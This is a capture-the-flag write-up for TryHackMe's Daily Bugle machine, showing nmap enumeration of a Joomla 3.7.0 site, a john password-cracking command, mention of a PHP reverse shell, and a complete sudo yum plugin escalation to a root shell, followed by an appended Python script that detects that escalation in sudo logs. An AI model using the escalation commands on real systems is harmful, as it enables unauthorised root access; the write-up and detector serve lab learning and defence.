Try Hack Me: Daily Bugle Write-up

Enumeration

> nmap -sC -sV <TARGET IP> -oN initial.nmap
# Nmap 7.91 scan initiated Tue Oct 5 22:17:37 2021 as: nmap -sC -sV -oN initial.nmap <TARGET IP>
Nmap scan report for <TARGET IP>
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open mysql MariaDB (unauthorized)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 5 22:18:23 2021 -- 1 IP address (1 host up) scanned in 46.00 seconds
The Daily Bugle site is running Joomla!. The language manifest at /language/en-GB/en-GB.xml reveals the version: Joomla! 3.7.0.

SQL Injection

Password Cracking

> john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt

Gaining a Foothold

Using pentestmonkey's PHP reverse shell to get an initial shell.

Privilege Escalation

su jjameson
sudo -l
[jjameson@dailybugle tmp]$ TF=$(mktemp -d)
[jjameson@dailybugle tmp]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
> EOF
[jjameson@dailybugle tmp]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# whoami
root
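As a defender's check, added here and not part of the original write-up: the Python below parses sudo syslog lines (assuming the standard `sudo: user : ... USER=root ; COMMAND=...` format) and flags yum invocations that point `-c`/`--config` at a config outside /etc, enable a plugin on the command line, or override plugin paths via `--setopt`, which is exactly the pattern in the escalation above. The log lines are constructed samples.

```python
import re
import shlex

# Constructed sample auth-log lines (not from the original write-up); the first
# mirrors the sudo yum plugin escalation shown above.
SAMPLE_LOG = """\
Oct  5 22:30:11 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/yum -c /tmp/tmp.Ab12Cd/x --enableplugin=y
Oct  5 22:31:02 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/yum update -y
Oct  5 22:32:45 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/bin/yum -c /etc/yum.conf check-update
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+)\s+:.*?USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$")
TRUSTED_CONF_PREFIX = "/etc/"  # a yum config anywhere else is user-writable in practice

def suspicious_yum_flags(cmd):
    """Return the reasons a yum command line looks like plugin abuse (empty if clean)."""
    argv = shlex.split(cmd)
    if not argv or argv[0].rsplit("/", 1)[-1] != "yum":
        return []
    reasons = []
    for i, arg in enumerate(argv):
        conf = None
        if arg == "-c" and i + 1 < len(argv):
            conf = argv[i + 1]
        elif arg.startswith("--config="):
            conf = arg.split("=", 1)[1]
        if conf is not None and not conf.startswith(TRUSTED_CONF_PREFIX):
            reasons.append(f"config outside {TRUSTED_CONF_PREFIX}: {conf}")
        if arg.startswith("--enableplugin"):
            reasons.append(f"plugin enabled on command line: {arg}")
        if arg.startswith("--setopt=plugin"):  # pluginpath= / pluginconfpath= overrides
            reasons.append(f"plugin path override: {arg}")
    return reasons

def scan_sudo_log(text):
    """Parse sudo log lines and return one finding per suspicious yum invocation."""
    findings = []
    for line in text.splitlines():
        m = SUDO_RE.search(line)
        if not m:
            continue
        reasons = suspicious_yum_flags(m.group("cmd"))
        if reasons:
            findings.append({"user": m.group("user"), "runas": m.group("runas"),
                             "cmd": m.group("cmd"), "reasons": reasons})
    return findings
```

Running `scan_sudo_log(SAMPLE_LOG)` flags only the first line; the mitigation is to drop the unrestricted `yum` sudo rule rather than to filter arguments.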

Max Register

Follow along as I post CTF write-ups in preparation for the OSCP!